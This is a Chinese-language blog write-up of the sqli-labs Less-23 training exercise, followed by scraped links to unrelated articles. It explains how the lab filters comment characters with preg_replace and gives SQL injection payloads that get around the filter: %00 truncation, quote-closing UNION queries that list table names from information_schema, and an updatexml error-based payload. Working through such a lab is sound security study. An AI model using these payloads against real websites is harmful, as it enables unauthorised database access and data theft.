Less-23 preg_replace1
Less-23:
直接跳到Less-23的原因是,Less-(11~22)均为注入点不为get方式的注入。我先把get型注入写的差不多,再回来整理关于注入点的内容。
核心语句:
查询、报错均有回显。
本题$sql及后面部分都与Less-1无异。然而,前面多了一些部分,起了过滤的作用。
要了解这些过滤,我们先要了解正则表达式。
正则表达式是一种描述字符串结果的语法规则,可以进行匹配、替换、截取等操作。
要写一个正则表达式,我们先要规定它的边界。
在本Less接触的正则表达式边界可用/text/ #text# ~text~ 三种。
preg_replace($reg,$replace,$id) 是一个正则替换函数,其中$reg必须是正则表达式。
当$reg为/text/ #text# ~text~形式时,其会将id中所有满足text的文本替换为reg
eg: $reg='/mmm/'
$replace=www''
$id='emmmm'
preg_replace(..)='ewwwm'
其他正则表达式的内容(通用原子、元字符、修饰符、正则表达函数等)我们遇到再写。
由上可知,本题中,我们的注释符--+和#均被禁用了。
面对这个问题,有多种解决方法:
1. %00截断
直接将注释符换为 %00,一切照旧就行了。至于为什么可以,我现在也不知道。它的适用范围,我也不知道。我暂且将它作为一种偷懒的方法。
eg: -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database(); %00
2. 语句屏蔽
既然无法直接注释后面,那么我们只能另辟蹊径。由于我们需要闭合引号后注入命令,注释的意义主要在于干掉语句中原有的后一个单引号,即让键入 ?id=1'时 不报错。
我们可以构造一些无意义的句子来闭合。
eg:?id=1' or '0'='1
这样,$sql就成了: SELECT * FROM users WHERE id='1' or '0'='1' LIMIT 0,1 ;
注意,此处不要写 1' or '1'='1; 这样where子句永远为真,查出的永远是第一个元素。
但此时,再写id=1' order by x or '0'='1 不可用。
mysql语句定义如下:
<SELECT clause> [<FROM clause>] [<WHERE clause>] [<GROUP BY clause>] [<HAVING clause>] [<ORDER BY clause>] [<LIMIT clause>]
然而,实际执行顺序并不是简单的从左向右/从右向左。
它的执行顺序为:from -> where -> group by -> having -> order by -> select -> limit
上述写法中的order by语句实际上在where子句中,而不是一个独立的子句,没有作用。即,这种注释并没有给我们创造出写新的子句的位置。
怎么办呢?
方法1:直接使用select语句。(但是,列数得慢慢试了)
eg:?id=1' union select 1,2,3 '
这样,$sql就成了: SELECT * FROM users WHERE id='1' union select 1,2,3 '' LIMIT 0,1; 回显成功。
我们将3改为database(),依然可用;但我们再改为group_concat(table_name) from information_schema.tables where table_schema=database()时,就报错了。
想想也应该会报错;要是直接就行了,Less-(1~4)里其实我们连注释都不需要了。
一个可用的修改方式为:(select group_concat(table_name) from information_schema.tables where table_schema=database())
为什么可以?
看下上述sql语句:
错误: SELECT * FROM users WHERE id='1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() '' LIMIT 0,1;
正确1: SELECT * FROM users WHERE id='1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) '' LIMIT 0,1;
正确2: SELECT * FROM users WHERE id='1' union select 1,2,database() '' LIMIT 0,1;
错误2: SELECT 1,2,3 from users '' limit 0,1;
正确3: SELECT 1,2,(select group_concat(3) from users) '' limit 0,1;
我先将其理解为:若查询语句完全没有跟随其他字句,后面加 '' 依然正确 ; 否则错误。
方法2:报错注入。
之前从?id=1' or '0'='1切换成?id=1' union select 1,2,3 ' 时,我一开始其实切换的是?id=1' union select 1,2,3 or '0'='1
但是,这样会导致3 or '0'='1 构成一个查询的列, 这个点恒回显1,反而妨碍了注入。
但这,再结合之前id=1' order by x or '0'='1的失败,给了我们启示:能不能构造一个语句,使得or不属于子句,也不属于列,而是分割两个操作呢?
这里直接给出payload:
?id=-1' and updatexml(1,concat(0x7e,(select(database()))),1) and '1'='1
修改select中的内容,即可继续注入。
(终于结束了)
(这题真长啊)
Less-23 preg_replace1的更多相关文章
- Java开发中的23种设计模式详解
[放弃了原文访问者模式的Demo,自己写了一个新使用场景的Demo,加上了自己的理解] [源码地址:https://github.com/leon66666/DesignPattern] 一.设计模式 ...
- ILJMALL project过程中遇到Fragment嵌套问题:IllegalArgumentException: Binary XML file line #23: Duplicate id
出现场景:当点击"分类"再返回"首页"时,发生error退出 BUG描述:Caused by: java.lang.IllegalArgumentExcep ...
- CSharpGL(23)用ComputeShader实现一个简单的ParticleSimulator
CSharpGL(23)用ComputeShader实现一个简单的ParticleSimulator 我还没有用过Compute Shader,所以现在把红宝书里的例子拿来了,加入CSharpGL中. ...
- ABP(现代ASP.NET样板开发框架)系列之23、ABP展现层——异常处理
点这里进入ABP系列文章总目录 基于DDD的现代ASP.NET开发框架--ABP系列之23.ABP展现层——异常处理 ABP是“ASP.NET Boilerplate Project (ASP.NET ...
- Java开发中的23种设计模式详解(转)
设计模式(Design Patterns) ——可复用面向对象软件的基础 设计模式(Design pattern)是一套被反复使用.多数人知晓的.经过分类编目的.代码设计经验的总结.使用设计模式是为了 ...
- C#得到某月最后一天晚上23:59:59和某月第一天00:00:00
项目需求: 某学校订单截止操作时间的上一个月最后一天晚上23:59:59 为止所有支付的订单统计: 代码: /// <summary> /// 通过学校和截止时间得到订单 /// < ...
- C#开发微信门户及应用(23)-微信小店商品管理接口的封装和测试
在上篇<C#开发微信门户及应用(22)-微信小店的开发和使用>里面介绍了一些微信小店的基础知识,以及对应的对象模型,本篇继续微信小店的主题,介绍其中API接口的封装和测试使用.微信小店的相 ...
- [转载]IIS7报500.23错误的解决方法
原文出处: 原文作者:pizibaidu 原文链接:http://pizibaidu.blog.51cto.com/1361909/1794446 背景:今天公司终端上有一个功能打开异常,报500错误 ...
- [MySQL Reference Manual] 23 Performance Schema结构
23 MySQL Performance Schema 23 MySQL Performance Schema 23.1 性能框架快速启动 23.2 性能框架配置 23.2.1 性能框架编译时配置 2 ...
- Error:failed to find Build Tools revision 23.0.0 rc3
解决,选择AS里有的版本就可以了,已有的我这就一个23.0.3,导入的项目是23.0.2 Donate:)
随机推荐
- vue 微信二维码扫码登录,附加 自定义样式
大概流程: 先安装 微信 的登录, 然后 局部引入,局部注册,方法调用,存 token,跳转路由 npm 安装 npm install vue-wxlogin --save-dev 微信安装 微信 ...
- python 常用的文件操作命令
一.python中对文件.文件夹操作时经常用到的os模块和shutil模块常用方法. 1.得到当前工作目录,即当前Python脚本工作的目录路径: os.getcwd() 2.返回指定目录下的所有文件 ...
- linux常用查询命令
1 **系统** 2 # uname -a # 查看内核/操作系统/CPU信息 3 # head -n 1 /etc/issue # 查看操作系统版本 4 # cat /proc/cpuinfo # ...
- AOP快速入门
一.概念 AOP面向切面编程,是函数式编程的延申,是对OOP的补充: 代理模式:拦截增强作用,增强功能: 1.java继承,纵向共性抽取, 2.横向切面AOP织入增强代码方式 二.原理是通过代理机制, ...
- 【OI技巧】解决cin、cout因输入输出慢而TLE的问题
语言本身没有问题!! 语言本身没有问题!! 语言本身没有问题!! C++本来的设计就是将输入输出流和C的标准输入输出挂钩在一起,这样就导致cin,cout输入输出前先要将内容放入缓冲区,最后再由cin ...
- linux命令(用户)
一.常用命令 1.1 ls ls 命令是 linux 下最常用的命令,ls 命令就是 list 的缩写. ls 用来打印出当前目录的清单.如果 ls 指定其他目录,那么就会显示指定目录里的文件及文件夹 ...
- 用java代码遍历excel文件并回显
今天需要完成282个指标,分析后发现好多都是可复用的字段和方法,生成的dao类也是很多重复的代码,所以写下了简单的自动化遍历excel的test方法, excel业务逻辑如下,用了 HSSFSheet ...
- linux7可以通过远程和localhost访问mysql,但是127.0.0.1不能访问
网上搜索的其他方法都试过,不行 比如设置权限,开放端口,配置数据库... 最好偶然一个搜索查看可能原因是防火墙端口问题: vim /etc/sysconfig/iptables 在文件中添加下面语句 ...
- google插件网页播放mp4代码
<script src="http://html5media.googlecode.com/svn/trunk/src/html5media.min.js"></ ...
- WireShark高级用法
报文注释 分组注释 尽量使用英文注释 时间显示 显示实际时间 抓包过滤器 按照规则抓取报文 显示过滤器 按照规则显示报文 自动生成过滤条件:做为过滤器应用 着色规则 默认 可自定义着色规则 追踪数据流 ...